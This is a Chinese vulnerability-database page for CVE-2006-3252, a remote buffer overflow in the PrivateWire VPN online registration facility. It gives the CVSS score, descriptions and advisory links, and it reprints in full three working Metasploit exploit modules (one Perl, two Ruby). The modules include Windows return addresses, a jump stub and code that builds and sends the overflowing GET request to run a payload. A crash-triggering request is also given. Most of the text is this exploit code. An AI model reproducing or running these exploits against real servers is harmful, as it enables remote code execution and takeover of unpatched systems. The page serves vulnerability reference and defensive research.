CVE-2006-3252
CVSS7.5
发布时间 :2006-06-27 14:05:00
修订时间 :2011-03-07 21:38:12
NMCOEPS    

[原文]Buffer overflow in the Online Registration Facility for Algorithmic Research PrivateWire VPN software up to 3.7 allows remote attackers to execute arbitrary code via a long GET request.


[CNNVD]Algorithmic Research PrivateWire 在线注册 远程缓冲区溢出漏洞(CNNVD-200606-516)

        Algorithmic Research PrivateWire是一种保护客户端与服务端之间的通信的安全套件。
        PrivateWire在处理在线注册时请求时存在缓冲区溢出漏洞,远程攻击者可以通过发送超长的GET请求导致缓冲区溢出,从而执行任意指令,控制服务器。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3252
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3252
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200606-516
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2006/2549
(UNKNOWN)  VUPEN  ADV-2006-2549
http://www.securityfocus.com/bid/18647
(UNKNOWN)  BID  18647
http://www.securityfocus.com/archive/1/archive/1/438329/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060626 ERNW Security Advisory 01/2006
http://xforce.iss.net/xforce/xfdb/27430
(UNKNOWN)  XF  privatewire-registration-bo(27430)
http://securitytracker.com/id?1016382
(UNKNOWN)  SECTRACK  1016382
http://securityreason.com/securityalert/1152
(UNKNOWN)  SREASON  1152
http://secunia.com/advisories/20812
(UNKNOWN)  SECUNIA  20812

- 漏洞信息

Algorithmic Research PrivateWire 在线注册 远程缓冲区溢出漏洞
高危 缓冲区溢出
2006-06-27 00:00:00 2006-06-28 00:00:00
远程  
        Algorithmic Research PrivateWire是一种保护客户端与服务端之间的通信的安全套件。
        PrivateWire在处理在线注册时请求时存在缓冲区溢出漏洞,远程攻击者可以通过发送超长的GET请求导致缓冲区溢出,从而执行任意指令,控制服务器。

- 公告与补丁

        暂无数据

- 漏洞信息 (2680)

PrivateWire Gateway 3.7 Remote Buffer Overflow Exploit (win32) (EDBID:2680)
windows remote
2006-10-29 Verified
80 Michael Thumann
N/A [点击下载]
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

##
# From the author:
# This file may only be distributed as part of the Metasploit Framework.
# Any other use needs a written permission from the author.
##

package Msf::Exploit::privatewire_gateway_win32;
use base "Msf::Exploit";
use strict;
use Pex::Text;

my $advanced = { };

my $info =
  {
	'Name'  => 'Private Wire Gateway Buffer Overflow (win32)',
	'Version'  => '$Rev$',
	'Authors' =>
	  [
		'Michael Thumann  <mthumann[at]ernw.de>',
	  ],
	'Arch'  => [ 'x86' ],
	'OS'    => [ 'win32' ],
	'Priv'  => 1,

	'UserOpts'  =>
	  {
		'RHOST' => [1, 'ADDR', 'The target address'],
		'RPORT' => [1, 'PORT', 'The target port', 80],
		'PATH'  => [1, 'DATA', 'Installation Path of Privatewire','C:\Cipgw'],
	  },

	'Payload' =>
	  {
		'Space'    => 8000,
		'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x1b",
		'Prepend'  => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500
	  },

	'Description'  => Pex::Text::Freeform(qq{
        This exploits a buffer overflow in the ADMCREG.EXE used
        in the PrivateWire Online Registration Facility. .
}),

	'Refs'  =>
	  [
		['BID', '18647'],
	  ],

	'DefaultTarget' => 4,
	'Targets' => [
		['Windows 2000 English SP0', 0x77e3c289], # jmp esp USER32.DLL
		['Windows 2000 English SP1', 0x77e3cb4c], # jmp esp USER32.DLL
		['Windows 2000 English SP2', 0x77e3af64], # jmp esp USER32.DLL
		['Windows 2000 English SP3', 0x77e388a7], # jmp esp USER32.DLL
		['Windows 2000 English SP4', 0x77e3c256], # jmp esp USER32.DLL
		['Windows 2003 English SP0/SP1', 0x77d74c94], # jmp esp USER32.DLL
		['Debugging', 0x41414141], # Crash
	  ],

	'Keys' => ['privatewire'],

	'DisclosureDate' => 'June 26 2006',
  };

sub new {
	my $class = shift;
	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
	return($self);
}

sub Exploit
{
	my $self = shift;
	my $target_host = $self->GetVar('RHOST');
	my $target_port = $self->GetVar('RPORT');
	my $target_idx  = $self->GetVar('TARGET');
	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
	my $path        = $self->GetVar('PATH');
	my $path_offset = length($path)-8;

	my $target = $self->Targets->[$target_idx];

	my $pattern = Pex::Text::AlphaNumText(8192);
	my $jmp = # add 25 to ecx and jmp
	  "\x6a\x19".
	  "\x58".
	  "\x01\xc1".
	  "\xff\xe1";
	substr($pattern, 0, length($shellcode), $shellcode);
	substr($pattern, 8156- $path_offset, 4, pack('V', $target->[1]));
	substr($pattern, 8160, length($jmp), $jmp);

	my $request = "GET /" . $pattern . " HTTP/1.0\r\n\r\n";

	$self->PrintLine(sprintf ("[*] Trying ".$target->[0]." using jmp esp at 0x%.8x...", $target->[1]));

	my $s = Msf::Socket::Tcp->new
	  (
		'PeerAddr'  => $target_host,
		'PeerPort'  => $target_port,
		'LocalPort' => $self->GetVar('CPORT'),
	  );
	if ($s->IsError) {
		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
		return;
	}

	$s->Send($request);
	$s->Close();
	return;
}

1;

# milw0rm.com [2006-10-29]
		

- 漏洞信息 (16760)

Private Wire Gateway Buffer Overflow (EDBID:16760)
windows remote
2010-04-30 Verified
80 metasploit
N/A [点击下载]
##
# $Id: privatewire_gateway.rb 9179 2010-04-30 08:40:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

# This file may only be distributed as part of the Metasploit Framework.
# Any other use needs a written permission from the author.

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Private Wire Gateway Buffer Overflow',
			'Description'    => %q{
					This exploits a buffer overflow in the ADMCREG.EXE used
				in the PrivateWire Online Registration Facility.
			},
			'Author'         => 'Michael Thumann <mthumann[at]ernw.de>',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9179 $',
			'References'     =>
				[
					['CVE', '2006-3252'],
					['OSVDB', '26861'],
					['BID', '18647'],
				],
			'Payload'        =>
				{
					'Space'    => 8000,
					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x1b",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					['Windows 2000 English SP0',     { 'Ret' => 0x77e3c289 }], # jmp esp user32.dll
					['Windows 2000 English SP1',     { 'Ret' => 0x77e3cb4c }], # jmp esp user32.dll
					['Windows 2000 English SP2',     { 'Ret' => 0x77e3af64 }], # jmp esp user32.dll
					['Windows 2000 English SP3',     { 'Ret' => 0x77e388a7 }], # jmp esp user32.dll
					['Windows 2000 English SP4',     { 'Ret' => 0x77e3c256 }], # jmp esp user32.dll
					['Windows 2003 English SP0/SP1', { 'Ret' => 0x77d74c94 }], # jmp esp user32.dll
					['Debugging',                    { 'Ret' => 0x41414141 }], # crash
				],
			'DefaultTarget'  => 4,
			'DisclosureDate' => 'Jun 26 2006'))

		register_options(
			[
				OptString.new('PATH', [ true, "Installation path of Privatewire", 'C:\Cipgw' ])
			], self.class)
	end

	def exploit
		# add 25 to ecx and jmp
		jmp = "\x6a\x19\x58\x01\xc1\xff\xe1"

		path_offset = datastore['PATH'].length - 8

		pattern                            = rand_text_alphanumeric(8192)
		pattern[0, payload.encoded.length] = payload.encoded
		pattern[8156 - path_offset, 4]     = [target.ret].pack('V')
		pattern[8160, jmp.length]          = jmp

		print_status("Trying #{target.name} using jmp esp at #{"%.8x" % target.ret}")

		send_request_raw({
				'uri' => "/" + pattern
			}, 2)
	end

end
		

- 漏洞信息 (F82976)

Private Wire Gateway Buffer Overflow (PacketStormID:F82976)
2009-11-26 00:00:00
Michael Thumann  metasploit.com
exploit,overflow
CVE-2006-3252
[点击下载]

This exploits a buffer overflow in the ADMCREG.EXE used in the PrivateWire Online Registration Facility.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


# This file may only be distributed as part of the Metasploit Framework.
# Any other use needs a written permission from the author.

require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Private Wire Gateway Buffer Overflow',
			'Description'    => %q{
        This exploits a buffer overflow in the ADMCREG.EXE used
        in the PrivateWire Online Registration Facility.
			},
			'Author'         => 'Michael Thumann <mthumann[at]ernw.de>',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					['CVE', '2006-3252'],
					['OSVDB', '26861'],
					['BID', '18647'],
				],
			'Payload'        =>
				{
					'Space'    => 8000,
					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x1b",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        => 
				[
					['Windows 2000 English SP0',     { 'Ret' => 0x77e3c289 }], # jmp esp user32.dll
					['Windows 2000 English SP1',     { 'Ret' => 0x77e3cb4c }], # jmp esp user32.dll
					['Windows 2000 English SP2',     { 'Ret' => 0x77e3af64 }], # jmp esp user32.dll
					['Windows 2000 English SP3',     { 'Ret' => 0x77e388a7 }], # jmp esp user32.dll
					['Windows 2000 English SP4',     { 'Ret' => 0x77e3c256 }], # jmp esp user32.dll
					['Windows 2003 English SP0/SP1', { 'Ret' => 0x77d74c94 }], # jmp esp user32.dll
					['Debugging',                    { 'Ret' => 0x41414141 }], # crash
				],	
			'DefaultTarget'  => 4,
			'DisclosureDate' => 'Jun 26 2006'))
			
			register_options( 
				[ 
					OptString.new('PATH', [ true, "Installation path of Privatewire", 'C:\Cipgw' ])
				], self.class)
	end

	def exploit
		# add 25 to ecx and jmp
		jmp = "\x6a\x19\x58\x01\xc1\xff\xe1"
			
		path_offset = datastore['PATH'].length - 8
		
		pattern                            = rand_text_alphanumeric(8192)
		pattern[0, payload.encoded.length] = payload.encoded
		pattern[8156 - path_offset, 4]     = [target.ret].pack('V')
		pattern[8160, jmp.length]          = jmp

		print_status("Trying #{target.name} using jmp esp at #{"%.8x" % target.ret}")

		send_request_raw({
				'uri' => "/" + pattern
			}, 2)
	end

end
    

- 漏洞信息

26861
PrivateWire Registration Functionality GET Request Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

A buffer overflow exists in PrivateWire. The registration functionality fails to validate GET requests resulting in a buffer overflow. With a specially crafted request, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2006-06-26 2005-12-09
Unknow Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

- 漏洞信息

Algorithmic Research PrivateWire Online Registration Remote Buffer Overflow Vulnerability
Boundary Condition Error 18647
Yes No
2006-06-26 12:00:00 2007-05-30 06:01:00
Michael Thumann has been credited for the discovery of this vulnerability

- 受影响的程序版本

Algorithmic Research PrivateWire Gateway 3.7

- 漏洞讨论

PrivateWire online registration is prone to a remote buffer-overflow vulnerability.

The application fails to properly check boundary conditions when handling GET requests.

This issue allows attackers to execute arbitrary machine code in the context of the affected application software.

PrivateWire 3.7 is vulnerable to this issue; previous versions may also be affected.

- 漏洞利用

The following HTTP GET request is sufficient to demonstrate this issue by crashing the application:
GET /<8160 'A' characters>.

The following exploit code is available:

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: mailto:vuldb@securityfocus.com.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站